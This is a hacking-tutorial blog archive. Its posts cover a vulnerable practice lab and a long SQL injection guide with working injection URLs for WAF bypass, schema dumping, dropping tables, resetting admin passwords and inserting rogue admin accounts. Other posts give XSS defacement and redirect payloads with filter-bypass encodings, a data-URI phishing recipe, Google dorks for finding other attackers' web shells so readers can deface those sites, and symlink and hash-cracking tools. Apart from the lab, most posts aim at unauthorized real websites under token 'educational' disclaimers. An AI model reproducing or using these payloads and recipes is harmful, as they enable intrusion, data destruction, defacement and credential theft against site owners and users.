Showing posts with label Hacking Tutorials. Show all posts
Showing posts with label Hacking Tutorials. Show all posts

Tuesday, December 17, 2013

BTS PenTesting Lab - a vulnerable web application to learn common vulnerabilities


The most common question from students who is learning website hacking techniques is "how to test my skills legally without getting into troubles?". Here is solution for you guys, you can learn web application Pentesting with our New app "BTS Pentesting Lab".


BTS PenTesting Lab is a vulnerable web application that allows you to learn from basic to advanced  vulnerability techniques.

Currently, the app contains following vulnerability types:

  • SQL Injection
  • Cross Site scripting(XSS)
  • Cross Site request Forgery(CSRF)
  • Clickjacking
  • Server Side Request Forgery(SSRF))
  • File Inclusion(RFI and LFI)
  • Remote Code Execution

Download the latest version of BTS Lab
https://sourceforge.net/projects/btslab/files/latest/download


How to run BTS PenTesting Lab?
1. Install XAMPP or WAMPP in your machine
2. Extract the zip file into the htdocs folder (make sure to rename the folder to "btslab").
3.  Open the "http://localhost/btslab/setup.php" url in your browser.
4. Click the Setup.

That's all Now you can start to use the app at "http://localhost/btslab" :)

In next update, i will add more vulnerability types and advanced techniques.  My next articles will be based on this app :)
Continue   Reading>>

Saturday, February 23, 2013

SQL Injection Tutorial: All common SQL injection problems and Solutions



Hello readers of BTS,
    Today I'll write an tutorial for you what covers most problems while doing SQL injection and solutions to them. Probably every person who has looked at tutorials to hack a website have noticed that there are too much SQL tutorials. Almost every forum has 10 tutorials and blogs 5 tutorials about SQL injection, but actually those tutorials are stolen from somewhere else and the author doesn't probably even know why does SQL injection work. All of those tutorials are like textbooks with their ABC's and the result is just a mess. Everyone are writing tutorials about SQL, but nobody covers the problems what will come with that attack.

What is the cause of most problems related to SQL injection?

Webdevelopers aren't always really dumb and they have also heard of hackers and have implemented some security measures like WAF or manual protetion. WAF is an Web application firewall and will block all malicous requests, but WAF's are quite easy to bypass. Nobody would like to have their site hacked and they are also implementing some security, but ofcourse it would be false to say that if we fail then it's the servers fault. There's also a huge possibility that we're injecting otherwise than we should.

A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.

If you're interested about WAF's and how they're working then I suggest to read it from wikipedia http://en.wikipedia.org/wiki/Application_firewall


Order by is being blocked?


It rarely happens, but sometimes you can't use order by because the WAF has blocked it or some other reasons. Unfortunally we can't skip the order by and we have to find another way. The way is simple, instead of using Order by we have to use Group by because that's very unlikely to be blacklisted by the WAF.

If that request will return 'forbidden' then it means it's blocked.
http://site.com/gallery?id=1 order by 100--
Then you have to try to use Group by and it will return correct :
http://site.com/gallery?id=1 group by 100-- / success
Still there's an possibility that WAF will block the request, but there's on other way also and that's not very widely known. It's about using ( the main query ) = (select 1)
http://example.org/news.php?id=8 and (select * from admins)=(select 1)
Then you'll probably recive an error like this : Operand should contain 5 column(s).

That error means there are 5 columns and it means we can proceed to our next step what's union select. The command was different than usual, but the further injection will be the same.
http://site.com/news.php?id=-8 union select 1,2,3,4,5--

'order by 10000' and still not error?

That's an small chapter where I'll tell you why sometimes order by won't work and you don't see an error. The difference between this capther and the last one is that previously your requests were blocked by the WAF, but here's the injection method is just a littlebit different. When I saw that on my first time then I thought how does a Database have 100000 columns because I'm not getting the error while the site is vulnerable?

The answer is quite logical. By trying order by 1000000 we're not getting the error because there are so many columns in there, we're not getting the error because our injecting isn't working.

Example : site.com/news.php?id=9 order by 10000000000-- [No Error]
to bypass this you just have to change the URL littlebit.Add ' after the ID number and at the end just enter +

Example :
site.com/news.php?id=9' order by 10000000--+[Error]
If the last example is working for you then it means you have to use it in the next steps also, there isn't anything complicated, but to make everything clear I'll still make an example.

http://site.com/news.php?id=-9' union select 1,2,3,4,5,6,7,8--+

Extracting data from other database.

Sometimes we can inject succesfully and there doesn't appear any error, it's just like a hackers dream. That dream will end at the moment when we'll see that there doesn't exist anything useful to us. There are only few tables and are called "News", "gallery" and "articles". They aren't useful at all to us because we'd like to see tables like "Admin" or "Administrator". Still we know that the server probably has several databases and even if we have found the information we're looking for, you should still take a look in the other databases also.

This will give you Schema names.
site.com/news.php?id=9 union select 1,2,group_concat(schema_name),4 from information_schema.schemata

And with this code you can get the tables from the schema.
site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x

This code will give you the column names.
site.com/news.php?id=9 union select 1,2,group_concat(column_name),4 from information_schema.tables where table_schema=0x and table_name=0x

I get error if I try to extract tables.


site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables

Le wild Error appears.
"you have an error in your sql syntax near '' at line 1"
Change the URL for this
site.com/news.php?id=9 union select 1,2,concat(unhex(hex(table_name),4 from information_schema.tables limit 0,1--


How to bypass WAF/Web application firewall

The biggest reason why most of reasons are appearing are because of security measures added to the server and WAF is the biggest reason, but mostly they're made really badly and can be bypassed really easily. Mostly you will get error 404 like it's in the code below, this is WAF. Most likely persons who're into SQL injection and bypassing WAF's are thinking at the moment "Dude, only one bypassing method?", but in this case we both know that bypassing WAF's is different kind of science and I could write a ebook on bypassing these. I'll keep all those bypassing queries to another time and won't cover that this time.

"404 forbidden you do not have permission to access to this webpage"

The code will look like this if you get the error
http://www.site.com/index.php?id=-1+union+select+1,2,3,4,5--
[Error]

Change the url Like it's below.
http://www.site.com/index.php?id=-1+/*!UnIoN*/+/*!sELeCt*/1,2,3,4,5--
[No error]

Is it possible to modify the information in the database by SQL injection?

Most of people aren't aware of it, but it's possible. You're able to Update, Drop, insert and select information. Most of people who're dealing with SQL injection has never looked deeper in the attack than shown in the average SQL injection tutorial, but an average SQL injection tutorial doesn't have those statements added. Most likely because most of people are copy&pasting tutorials or just overwriting them. You might ask that why should one update, drop or insert information into the database if I can just look into the information to use the current ones, why should we make another Administrator account if there already exists one?

Reading the information is just one part of the injection and sometimes those other commands what are quite infamous are more powerful than we thought. If you have read all those avalible SQL injection tutorials then you're probably aware that you can read the information, but you didn't knew you're able to modify it. If you have tried SQL injecting then you have probably faced some problems that there aren't administrator account, why not to use the Insert command to add one? There aren't admin page to login, why not to drop the table and all information so nobody could access it? I want to get rid of the current Administrator and can't change his password, why not to use the update commands to change the password of the Administrator?

You have probably noticed that I have talked alot about unneccesary information what you probably don't need to know, but that's an information you need to learn and understand to become a real hacker because you have to learn how SQL databases are working to fiqure it out how those commands are working because you can't find tutorials about it from the network. It's just like math you learn in school, if you won't learn it then you'll be in trouble when you grow up.

Theory is almost over and now let's get to the practice.

Let's say that we're visiting that page and it's vulnerable to SQL injection.

http://site.com/news.php?id=1


You have to start injecting to look at the tables and columns in them, but let's assume that the current table is named as "News".
With SQL injection you can SELECT, DROP, UPDATE and INSERT information to the database. The SELECT is probably already covered at all the tutorials so let's focus on the other three. Let's start with the DROP command.

I'd like to get rid of a table, how to do it?

http://site.com/news.php?id=1; DROP TABLE news

That seems easy, we have just dropped the table. I'd explain what we did in the above statement, but it's quite hard to explain it because you all can understand the above command. Unfortunally most of 'hackers' who're making tutorials on SQL injection aren't aware of it and sometimes that three words are more important than all the information we can read on some tutorials.

Let's head to the next statement what's UPDATE.
http://site.com/news.php?id=1; UPDATE 'Table name' SET 'data you want to edit' = 'new data' WHERE column_name='information'--

Above explanation might be quite confusing so I'll add an query what you're most likely going to use in real life :

http://site.com/news.php?id=1; UPDATE 'admin_login' SET 'password' = 'Crackhackforum' WHERE login_name='Rynaldo'--

We have just updated Administrator account's password.In the above example we updated the column called 'admin_login" and added a password what is "Crackhackforum" and that credentials belongs to account which's username is Rynaldo. Kinda heavy to explain, but I hope you'll understand.


How does INSERT work?


Luckily "INSERT" isn't that easy as the "DROP" statement is, but still quite understandable. Let's go further with Administrator privileges because that's what most of people are heading to. Adding an administrator account would be like this :
http://site.com/news.php?id=1; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (2,'Rynaldo','Crackhackforum','NA')--

INSERT INTO 'admin_login' means that we're inserting something to 'admin_login'. Now we have to give instructions to the database what exact information we want to add, ('login_id', 'login_name', 'password', 'details') means that the specifications we're adding to the DB are Login_id, Login_name, password and details and those are the information the database needs to create a new account. So far we have told the database what information we want to add, we want to add new account, password to it, account ID and details. Now we have to tell the database what will be the new account's username, it's password and account ID, VALUES (2,'Rynaldo','Crackhackforum','NA')-- . That means account ID is 2, username will be Rynaldo, password of the account will be Crackhackforum. Your new account has been added to the database and all you have to do is opening up the Administrator page and login.

Passwords aren't working

Sometimes the site is vulnerable to SQL and you can get the passwords.Then you can find the sites username and password, but when you enter it into adminpanel then it shows "Wrong password".This can be because those usernames and passwords are there, but aren't working. This is made by site's admin to confuse you and actually the Cpanel doesn't contain any username/password. Sometimes are accounts removed, but the accounts are still in the database. Sometimes it isn't made by the admin and those credentials has been left in the database after removing the login page, sometimes the real credentials has been transfered to another database and old entries hasn't been deleted.

Sometimes i get some weird password

This weird password is called Hash and most likely it's MD5 hash.That means the sites admin has added more security to the website and has encrypted the passwords.Most popular crypting way is using MD5 hash.The best way to crack MD5 hashes is using PasswordsPro or Hashcat because they're the best and can crack the password even if it's really hard or isn't MD5. Also you can use http://md5decrypter.com .I don't like to be a person who's pitching around with small details what aren't correct, but here's an tip what you should keep in mind. The domain is saying it's "md5decryptor" what reffers to decrypting MD5 hashes. Actually it's not possible to decrypt a hash because they're having 'one-way' encryption. One way encryption means it can only be encrypted, but not decrypted. Still it doesn't mean that we can't know what does the hash mean, we have to crack it. Hashes can't be decrypted, only cracked. Those online sites aren't cracking hashes every time, they're saving already cracked hashes & results to their database and if you'll ask an hash what's already in their database, you will get the result. :)

Md5 hash looks like this : 827ccb0eea8a706c4c34a16891f84e7b = 12345
You can read about all Hashes what exist and their description http://pastebin.com/aiyxhQsf
Md5 hashes can't be decrypted, only cracked

How to find admin page of site?


Some sites doesn't contain admin control panel and that means you can use any method for finding the admin page, but that doesn't even exist. You might ask "I got the username and password from the database, why isn't there any admin login page then?", but sometimes they are just left in the database after removing the Cpanel.

Mostly people are using tools called "Admin page finders".They have some specific list of pages and will try them.If the page will give HTTP response 200 then it means the page exists, but if the server responds with HTTP response 404 then it means the page doesn't exist in there.If the page exist what is in the list then tool will say "Page found".I don't have any tool to share at the moment, but if you're downloading it yourself then be beware because there are most of those tools infected with virus's.

Mostly the tools I mentioned above, Admin Page Finders doesn't usually find the administrator page if it's costumly made or renamed. That means quite oftenly those tools doesn't help us out and we have to use an alternative and I think the best one is by using site crawlers. Most of you are probably having Acunetix Web Vulnerability scanner 8 and it has one wonderful feature called site crawler. It'll show you all the pages on the site and will %100 find the login page if there exists one in the page.


Automated SQL injection tools.

Automated SQL injection tools are programs what will do the whole work for you, sometimes they will even crack the hashes and will find the Administrator page for you. Most of people are using automated SQL injection tools and most popular of them are Havij and SQLmap. Havij is being used much more than SQLmap nomatter the other tool is much better for that injection. The sad truth why that's so is that many people aren't even able to run SQLmap and those persons are called script-kiddies. Being a script-kiddie is the worstest thing you can be in the hacking world and if you won't learn how to perform the attack manually and are only using tools then you're one of them. If you're using those tools to perform the attack then most of people will think that you're a script-kiddie because most likely you are. Proffesionals won't take you seriusly if you're injecting with them and you won't become a real hacker neither. My above text might give you an question, "But I've seen that even Proffesional hackers are using SQLmap?" and I'd like to say that everything isn't always black & white. If there are 10 databases, 50 tables in them and 100 columns in the table then it would just take days to proccess all that information.I'm also sometimes using automated tools because it makes my life easier, but to use those tools you first have to learn how to use those tools manually and that's what the tutorial above is teaching you.

Use automated tools only to make your life easier, but don't even look at them if you don't know how to perform the attack manually.

What else can I do with SQL injection besides extracting information?

There are many things besides extracting information from the database and sometimes they are much more powerful. We have talked above that sometimes the database doesn't contain Administrator's credentials or you can't crack the hashes. Then all the injection seems pointless because we can't use the information we have got from the database. Still we can use few another methods. Just like we can conduct CSRF attack with persistent XSS, we can also move to another attacks through SQL injection. One of the solution would be performing DOS attack on the website which is vulnerable to SQL injection. DOS is shortened from Denial of service and it's tottaly different from DDOS what's Distributed Denial of Service. I think that you all probably know what these are, but if I'm taking that attack up with a sentence then DOS will allow us to take down the website temporarely so users wouldn't have access to the site. The other way would be uploading our shell through SQL injection. If you're having a question about what's shell then by saying it shortly, it's a script what we'll upload to the server and it will create an backdoor for us and will give us all the privileges to do what we'd like in the server and sometimes by uploading a shell you're having more rights to modify things than the real Administrator has. After you have uploaded a shell you can move forward to symlink what means we can deface all the sites what are sharing the same server. Shelling the website is probably most powerful thing you can use on the website. I have not covered how to upload a shell through SQL injection and haven't covered how to cause DOS neither, but probably will do in my next tutorials because uploading a shell through SQL is another kind of science, just like bypassing WAF's. Those are the most common methods what attackers will put in use after they can't get anything useful out of the database. Ofcourse every website doesn't have the same vulnerabilities and they aren't responding always like we want and by that I mean we can't perform those attacks on all websites.We have all heard that immagination is unlimited and you can do whatever you'd like. That's kinda true and hacking isn't an exception, there are more ways than I can count.

What to do if all the information doesn't display on the page?
I actually have really rarely seen that there are so much information on the webpage that it all just don't fit in there, but one person recently asked that question from me and I decided to add it here. Also if you're having questions then surely ask and I'll update the article. If we're getting back to the question then the answer is simple, if all the information can't fit in the screen then you have to look at the source code because everything displayed on the webpage will be in there. Also sometimes information will appear in the tab where usually is the site's name. If you can't see the information then sometimes it's hiddened, but with taking a deeper look you might find it from the source. That's why you always have to look all the solutions out before quiting because sometimes you might think "I can't inject into that..", but actually the answer is hiddened in the source.


What is the purpose of '--' in the union+select+1,2,3,4,5-- ?
I suggest to read about null-byte's and here's a good explanation about it : http://en.wikipedia.org/wiki/Null_character because it might give you some hint why -- is being used . Purpose of adding -- in the end of the URL isn't always neccesary and it depends on the target. It doesn't have any influence to the injection because it doesn't mean anything, but it's still being used because it's used as end of query. It means if I'm injecting as : http://site.com/news.php?id=-1 union select 1,2,3,4,5-- asasdasd then the server will skip everything after -- and asasdasd won't be readed. It's just like adding to masking a shell. Sometimes injection isn't working if -- is missing because -- tells the DB that "I'm the end of query, don't read anything what comes after me and execute everything infront of me". It's just like writing a sentence without a dot, people might think it's not the end of your sentence and will wait until you write the other part of the sentence and the end will come if you add the dot to your sentence.


Credits:
Every sentence of this article is written by Crackhackforum.com staff Rynaldo.
BTS &BTS readers are really thankful to Rynaldo for submitting such a wonderful article to Break The Security.
Continue   Reading>>

Tuesday, September 4, 2012

How to create Phishing site without Webhost using Data URI?


Hello, BTS readers, it has been long time since i posted article in this blog.  Today i come across interesting news update which shares new technique used in the Phishing attack.

Phishing is one of the popular social engineering attack used by Cybercriminals. In this method, hackers host a fake webpage which looks similar to the original page of the website.

Then, hackers lure users to visit the phishing page by tricking them with legitimate-looking mails. When a user enter the login data in the phishing page, the info will be stored in hackers' database. At the end,  users will be redirected to original website so that users won't realize that they are under attack. more details>>.

From the above , it is clear that Cybercriminals need a webhosting for hosting their phishing page. But the recent research shows that hosting site is no longer needed for hosting the phishing page(but you still need a webhosting to run a script that stores the data ).

Henning Klevjer, an information security student at the University of Oslo in Norway, shows how a hacker can create phishing page using Data URI.

What is Data URI?
Data URLs are a Uniform Resource Identifier scheme that allow you to include data items inline in a web page as if they were being referenced as external resources. Data URLs are a form of Uniform Resource Locators, although they do not in fact remotely locate anything. Instead, the resource data is contained within the URL string itself . This saves the browser from having to make additional HTTP requests for the external resources, and can thus increase page loading speed.

For Eg:
<img src='data:image/gif;base64,R0lGODlhyAAyAIABAAAAAP///yH+EUNyZWF0ZWQgd2l0aCBHSU1QACH5BAEKAAEALAsADgC9ACQAAAL+jI+py+0Po5y02ouz3rz7D4biSJZmBqSoerZMCpDwHLsBvND6gWt6bXP0DEPfD3gq8o6sW/NyDD6KSgz1WaomtFqJEimNdCtXJK6Mdc62z3KOxV0vwS852z3P9/Y/9V3YFkhDFEW4k2f4p8CEwKhG11j4aIc3CXd5ODRmeDgHptlkBlpTFYcJNMppiujHw9r6qJgYiZp21/cKO7sYqrLKK0qKNWqn6zdWWSoou6lLOcxU29kpS2ttOUhL3Ie8vPuqHNNsnKrN7WhZB4kXvb690x2c65x2ZlsN+3VPL238DY6JQrk3kL4NBOjOiRhB/fD56gXxnz9+uXwBu7bEoCd0TvMqmVsoyV80bAP1uZOnahC6lHJCogtn7tM4kjIL4pp10CPCW+9sUpt0MV89aCbDGD2KVOC+pEybBlnqNKpUEMWmWr3aYSbWrVy7ev0KNqzYsWTLmj2LNq3atWzbun0LN67cuXTr2r2LN6/evXz7+v1btwAAOw==' alt='BTS_Image'/>
The above code will display the following image in the page.
The fun part of the Data URI is that you can directly enter the code in the browser address bar and load the content.

For Eg:
Pasting the following code in the browser address bar will load the image directly.
data:image/gif;base64,R0lGODlhyAAyAIABAAAAAP///yH+EUNyZWF0ZWQgd2l0aCBHSU1QACH5BAEKAAEALAsADgC9ACQAAAL+jI+py+0Po5y02ouz3rz7D4biSJZmBqSoerZMCpDwHLsBvND6gWt6bXP0DEPfD3gq8o6sW/NyDD6KSgz1WaomtFqJEimNdCtXJK6Mdc62z3KOxV0vwS852z3P9/Y/9V3YFkhDFEW4k2f4p8CEwKhG11j4aIc3CXd5ODRmeDgHptlkBlpTFYcJNMppiujHw9r6qJgYiZp21/cKO7sYqrLKK0qKNWqn6zdWWSoou6lLOcxU29kpS2ttOUhL3Ie8vPuqHNNsnKrN7WhZB4kXvb690x2c65x2ZlsN+3VPL238DY6JQrk3kL4NBOjOiRhB/fD56gXxnz9+uXwBu7bEoCd0TvMqmVsoyV80bAP1uZOnahC6lHJCogtn7tM4kjIL4pp10CPCW+9sUpt0MV89aCbDGD2KVOC+pEybBlnqNKpUEMWmWr3aYSbWrVy7ev0KNqzYsWTLmj2LNq3atWzbun0LN67cuXTr2r2LN6/evXz7+v1btwAAOw==
Not only Image, you can load text, html and other supported formats. You got my point?! Yes, Cyber Criminals are able to load the entire phishing page using the data URI method.

The simplified version Data URI example(without base64 encoding):
data:text/html, <h1>BreakTheSecurity</h1>
Entering the above Data url in browser address bar will display the "BreakTheSecurity" text in the h1 format.

Data URIs follow this scheme:

data:[<mediatype>][;base64],<data>
Here, <mediatype> are one of the MIME media types described in RFC 2046[1]. Base64 encoding is optional.

How an attacker can use it for creating phishing page?
This section is not suitable for the one who doesn't know how to create normal phishing page. Read this post before reading this section.

Step 1:
Copy the source code from the original site(right click and select 'view page source')
Step 2:
Modify the code such that transfer user credentials to another location.
step 3:
Now encode the source code with base 64.
step 4:
Once you got the encoded code, create data uri by following the above scheme.
For Example
data:text/html;base64, encoded_code_goes_here
Alternatively you can use the site for creating the data URI:
http://software.hixie.ch/utilities/cgi/data/data

As the data url is too long, hackers will use the url shortening service. But google chrome shows warning whenever redirected from url shortening service to data url.

Reference:

Continue   Reading>>

Wednesday, August 1, 2012

Sunday, April 22, 2012

How to Use Ravan for Password Cracking?


In my previous article, i explained about the Ravan Tool.  Now let us see how to use the Ravan for cracking passwords.


Requriments:
Lot of Friends :
Ravan is Distributed password cracking method. So you will need lot of friends who have Pc with Internet connection. The speed of cracking will increase based on the number of pc contribute in the cracking.

How to use Ravan?

Step1:
  • Go to http://www.andlabs.org/tools/ravan.html
  • Enter the value of the hash that must be cracked
  • Enter the value of the salt, if it is not a salted hash then leave it blank
  • Enter the charset. Only these characters will be use in the brute force attack
  • Select the hashing algorithm (MD5, SHA1, SHA256, SHA512)
  • Select the position of the salt. (clear-text+salt or salt+clear-text)
  • Hit ‘Submit Hash’
Step 2:
 If hash is successfully submitted, it would return a URL.  Now you just need to send this URL to all your friends and ask them to click the start button.

    The main page manages the cracking so it must not be closed or the cracking would fail.

That is it. Once your friends click start they would be doing pieces of the work and submitting results back.


The main page would constantly monitor the progress of the cracking process and manage it across all the workers. You would be able to see the stats throughout the process, once the hash is cracked the clear-text value is displayed.

Continue   Reading>>

Ravan , JavaScript based Distributed Password cracking



You want to crack a hash but your system speed is low?! No need to worry..! Here is solution for you , "Distributed Password Cracking". Let me introduce a new tool called "Ravan" developed by LavaKumar.
About Ravan:
Ravan is a JavaScript based Distributed Computing system that can perform brute force attacks on salted hashes by distributing the task across several browsers. It makes use of HTML5 WebWorkers to start background JavaScript threads in the browsers of the workers, each worker computes a part of the hash cracking activity.
Ravan now supports MD5,SHA1,SHA256,SHA512 hashes.

How it works?
Ravan has three components:

Master:
The hash, salt, hashing algorithm, position of the salt (before or after salt) and the charset are submitted by the user. These are submitted to the web backend and it returns a ‘hash id’ which is unique to every submitted hash. It also supplies a ‘worker url’ specific to this hash that must be sent to potential workers.
Once the hash is submitted the master creates arrays of slots (each array contains 5 slots), this is submitted to the web backend. Each slot represents a small part of the keyspace, this is how the entire activity is broken down in to multiple tiny tasks. A single slot represents 1 million combinations.
The master constantly polls the web backend to check on the progress of the cracking process. As the existing list of slots is completed by the workers the master allots more slots. When a worker cracks the hash and returns the clear-text value the master confirm this and then signals all workers to stop cracking.

Web Backend:
The web backend acts as a proxy between the master and the workers. It does not perform any actual computation but validates the data submitted by both the parties and passes information between them.

Worker:
The worker performs the actual hard work of cracking the hashes. Each hash has a unique worker URL and this page explicitly asks for the user permission before the cracking process is started. Once the user accepts and clicks ‘Start’ the worker polls the web backend for available slots, the web backend returns an array of slots from its database. The worker cracks each slot and sends the result to the web backend. After completing all the slots it polls the web backend for more slots.

Here is the tool:
http://www.andlabs.org/tools/ravan.html

Tutorial: How to use Ravan Tool?
Continue   Reading>>

Wednesday, April 4, 2012

The Art of Human Hacking -Social Engineering(SE) tutorial series



Hello BTS readers, here we come with an interesting tutorial written by my friend Mr.Ashish Mistry who is the founder of Hcon and author of 'HconSTF ' project.


Hello all,

after a long time I am again started writing, In a hope that my believe in “sharing the spirit of learning” fulfills well. So from today I am going to write series of tutorials on my favorite topic, 'Social Engineering' (SE).

starting from small intro to very basics of what SE is, why should you learn and use it, How it works, and as we go on further in this series, we will look at 'leveraging SE into penetration testing'.

Disclaimer: All the examples used in the tutorials series are some of my own and some of from the random pick from internet and Social-net, so if any of the example accidentally meets your situation than, no one can held me responsible for anything in any regards what so ever. This are just for examples and totally educational purpose and I am not in an intention to offense anyone or anything.
This tutorials are for educational purpose only, only you as reader is responsible for whatever you do with this material published here and not the author and not the site.

So lets we begin with the first tutorial on SE,

what is social engineering???
Its an art of manipulating humans.
In more easy words 'tricking people so, they do what YOU want from them or get done by them'.

got confused??

Lets take one example:
suppose you go to some toyshop with your child, and your child want a toy car, so he asks to the sales person to show a car or any one he has may be seen from the display. So that sales person shows that car or always starts with a costly car so when the boy saw the car he asks for to take that car only because the sales person showed some features like lights and remote and all. But the toy car is too costly for your this month's budget and boy wants it anyhow, so you try to divert the child to some other little more in your budget car, as he is a small child so he does not listens to you and at the end of all this,
either you buy that costly car child wanted or he didn't get anything or some other car.

Now you might ask me “So whats new in this? Its very normal every child does it right???” but my point of this example is to explain a perfectly crafted and executed 'social engineering attack' in our day to day life.
In above example the social engineer was the shop's sales person who used the child to sell a costly car and have more money from you.

Basically the sales person targeted the nature of that child because he knows that once it is showed what a child wants than its very difficult for the parents to divert the child so he can sell as HE wanted.

So if you understand basic exploitation terms than,
  • Attacker = the sales person
  • Vulnerability (weakness) = child (actually the obvious nature)
  • Exploit (trick) = showing more costly car and showing more features of it to gain more attention of the child
  • Payload (purpose) = more money from you
  • Target = yes you guessed it right its YOU :)


Lets take another example:

This one is simple but real world example from Facebook,
a person shared this image of a quote from honorable Mr. APJ Abdul kalam.

Its good right ?? he is proud of him or liked the quote right ??
but lets now try to understand it by SE point of view.
there are some things to note down in the photograph
1. on the image - one website address is there
2. below the image again the website address is written

First let me tell you that the web address was not from any government site but a private product trading site which is totally unrelated to what the image is and marking the image with it is such a disrespect done by the person, anyways
so why anyone would do like this ??

a very simple but cleaver kind of SE here
  • Attacker = who initially edited this photo with web address
  • Vulnerability (weakness) = human nature of sharing and liking good photos/quotes
  • Exploit (trick) = the edited photo which has quote
  • Payload (purpose) = marketing of his web site, and reaching some more audience for business for FREE
  • Target = any one on Facebook who shares this photo

Another noticeable point is that if you see anything which is liked by your mind, it gets stored somewhere in your mind so when anyone around you ask or talk about any property or trading things, your mind might flashes about this site.
now after this example lets refine and add to our previous simple definition of SE.

"Its an art of manipulating people so that they do as you want or give you what you want from them. Without any kind of physical offense, Its a whole psychological process of targeting other peoples mind to gain their TRUST and exploiting it and using human weaknesses against target by crafting SE attacks by the kind of work we want to get done by others"

Hopefully now you must have got the idea of social engineering (SE), and some things to start understanding and observing it. but yes every human and its psychological behavior will be different, by studying your target and crafting attack according to you goal will going to give more success.for this one of the key thing is observation and quick responsive abilities if the attacker or social engineer.

So who can be considered as social engineers??
it can be anyone from your relative/friend, convincing you to do or believe what they say even if you don't want do do it or believe it.

It can be sales person, marketing parsons, thief/con artist, your boss, penetration testers, forensics experts or anyone around you !!

More on it, its not a new thing but it used from centuries by different people, even if you consider any historical persons from your nation.

Think on it, might be you had been social engineered by someone??? some where ??

Thats all for this first introductory tutorial.
If you have any Questions or want to give any feedback or anything you want to get explained in this tutorial series than please post in comments.


Article author: Ashish Mistry
Article license: Social Engineering tutorials series by Ashish Mistry is licensed under a Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License.
Continue   Reading>>

Sunday, February 19, 2012

How to hack a websites using Symlink Bypassing?



Symlink Bypassing:
Symlink is a method to reference other files and folder on Linux, in order to make linux work faster.  Symlink Bypassing is a hacking technique used to gain unauthorized access to folders on a server. Using this technique an hackers are able to hack multiple sites on a shared web hosting service.

Here is Video tutorial that explain how to hack a website using Symlink Bypassing, Video demo is created by SilentHacker.



Download symlink files from here :-
http://www.2shared.com/file/Xkcfffjr/Symlink_files_by_silent_hacker.html

Soon, i will explain more about Symlink Bypassing and post a text tutorial with Screenshots.!
Continue   Reading>>

Sunday, February 12, 2012

Google dork "Index of /sh3llZ" allows you to find shell uploaded by hackers



Usually hackers upload shell to victim's site using the vulnerability in that website. Shell allows hackers to hack/deface the website. Sometimes hackers left the shell in the vulnerable sites.  Here is simple google search allows you to find a shell uploaded by hackers.

Use one of the following google dork to find the shell:
  • intitle:index of/sh3llZ
  • "Index of /sh3llZ"
  • "/sh3llZ/uploadshell/uploadshell.php"
This will show the list of sites that has a sh3llZ folder. Probably, there will be link to c99 shell.  If you click the link, it will land you in a shell page. Using that shell, you can upload your own shells or deface the sites.

Credits:
DevilsCafe
Continue   Reading>>

Saturday, December 31, 2011

How to deface website with Cross Site Scripting ? : Complete XSS Tutorial



This is my third article about Cross site Scripting Tutorial. Last time, i explained how to do vulnerability test for XSS and some filter bypassing technique. Now let us see how a hacker deface a website with XSS vulnerability?

Never implement this technique. I am just explaining it for educational purpose only.

Defacing is one of the most common thing when the hacker found the vulnerability in website. Defacing is changing the content the website hacker content. Most of time, attacker use this technique to inform about the vulnerability to Admin. But it's bad idea..!

Script for chaning the background Color of a website:
<script>document.body.bgColor="red";</script>


Script for chaning the background image of a website:
<script>document.body.background="http://your_image.jpg";</script>


Defacement Page with Pastehtml:
First of all upload some defacement page(html) to pastehtml.com and get the link.

When you find a XSS vulnerable site, then insert the script as :
<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>

This script will redirect the page to your pastehtml defacement page.

Note: You can deface only persistent XSS vulnerable sites.
Continue   Reading>>

Sunday, December 25, 2011

Bypassing the XSS Filters : Advanced XSS Tutorials for Web application Pen Testing



copyrights reserved © BreakTheSecurity
Hi friends, last time, i explained what is XSS and how an attacker can inject malicious script in your site. As i promised earlier, i am writing this advanced XSS tutorial for you(still more articles will come).

Sometimes, website owner use XSS filters(WAF) to protect against XSS vulnerability.
For eg: if you put the <scirpt>alert("hi")</script> , the Filter will escape the "(quote) character , so the script will become
<script>alert(>xss detected<)</script>
Now this script won't work. Likewise Filters use different type of filtering method to give protection against the XSS.  In this case, we can use some tricks to bypass the filter.  Here i am going to cover that only.

1.Bypassing magic_quotes_gpc

The magic_quotes_gpc=ON is a PHP setting(configured in PHP.ini File) , it escapes the every ' (single-quote), " (double quote) and \  with a backslash automatically.
For Eg:
<scirpt>alert("hi");</script> will be filtered as <script>alert(\hi\)</script>.so the script won't work now.

This is well known filtering method, but we can easily bypass this filter by using ASCII characters instead.
For Eg:  alert("hi"); can be converted to
String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)
so the script will become <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>.  In this case there is no "(quotes) or '(single quotes) or / so the filter can't filter this thing.  Yes, it will successfully run the script.
String.fromCharCode() is a javascript function that converts ASCII value to Characters.

How to convert to ASCII values?

There are some online sites that converts to ASCII character. But i suggest you to use Hackbar Mozilla addon .

After installing hackbar add on ,press F9.  It will open the small box above the url bar. click the XSS->String.fromCharCode()

Now it will popup small window. enter the code for instance alert("Hi").  click ok button.  Now we got the output.

copy the code into the <script></script> inside and insert in the vulnerable sites

For eg: 
hxxp://vulnerable-site/search?q=<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>

2.HEX Encoding

we can encode our whole script into HEX code so that it can't be filtered.
For example:  <script>alert("Hi");</script> can be convert to HEX as:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
Now put the code in the vulnerable site request.
For ex:
hxxp://vulnerable-site/search?q=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
 Converting to HEX:
This site will convert to hex code: http://centricle.com/tools/ascii-hex/

3.Bypassing using Obfuscation

Some website admin put the script,alert in restricted word list.  so whenever you input this keywords, the filter will remove it and will give error message like "you are not allowed to search this". This can bypassed by changing the case of the keywords(namely Obfuscation). 
For eg:
<ScRipt>ALeRt("hi");</sCRipT>

This bypass technique rarely works but giving trial is worth.

4. Closing Tag

